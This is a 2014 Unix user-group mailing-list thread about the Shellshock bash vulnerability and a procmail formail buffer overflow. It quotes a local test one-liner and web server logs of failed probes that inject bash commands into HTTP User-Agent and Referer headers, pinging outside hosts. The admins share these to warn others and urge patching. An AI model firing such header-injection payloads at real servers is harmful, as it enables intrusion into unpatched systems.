[RndTbl] bash + procmail vulnerabilities
Gilbert E. Detillieux
gedetil at cs.umanitoba.ca
Thu Sep 25 16:01:54 CDT 2014
Didn't take the script kiddies long to start trying...
89.207.135.125 - - [25/Sep/2014:03:22:13 -0500] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 295 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:13:49:53 -0500] "GET / HTTP/1.1" 301 301
"() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1
104.131.0.69"
The above is on the MUUG web server. Of course, they didn't get
anywhere with either of these attempts.
I have another host, with some CGI scripts that have names of the form
*/cgi-bin/*.sh, and those URL's are seeing a lot of attempts (all failed
as well). I guess they've got lists of potential target URL's to try,
and anything ending in ".sh" is going to be irresistible!
Keeps life interesting, for some, I suppose.
Gilbert
On 25/09/2014 7:23 AM, Sean Walberg wrote:
> I'm trying to guess how? In what instance is some program allowing
> network vectors to set env vars, especially without sterilization? Or
> do I not want to know...
>
>
> My guess would be anything attached to a web server -- CGI, dynamic apps
> that shell out to stuff like imagemagick, etc. Headers are passed
> through to the script: HTTP_REFERER, USER_AGENT, and so forth.
>
> Sean
>
> On Thu, Sep 25, 2014 at 6:02 AM, Trevor Cordes <trevor at tecnopolis.ca
> <mailto:trevor at tecnopolis.ca>> wrote:
>
> Wonderful, another day, another big bad security hole... or two.
>
> Run your patches!
>
> First up: bash:
> $ env x='() { :;}; echo OOPS' bash -c /usr/sbin/nologin
> OOPS
> This account is currently not available.
>
> http://www.openwall.com/lists/oss-security/2014/09/24/10
>
> claims:
>
> > In many common configurations, this vulnerability is exploitable over
> > the network.
>
> I'm trying to guess how? In what instance is some program allowing
> network vectors to set env vars, especially without sterilization? Or
> do I not want to know...
>
> Next up, procmail has a formail buffer overflow that may or may not
> allow arb code exec CVE-2014-3618. Many stock procmail recipes use
> formail. It's easy to see how this one is remotely exploitable.
--
Gilbert E. Detillieux E-mail: <gedetil at muug.mb.ca>
Manitoba UNIX User Group Web: http://www.muug.mb.ca/
PO Box 130 St-Boniface Phone: (204)474-8161
Winnipeg MB CANADA R2H 3B4 Fax: (204)474-7609
More information about the Roundtable
mailing list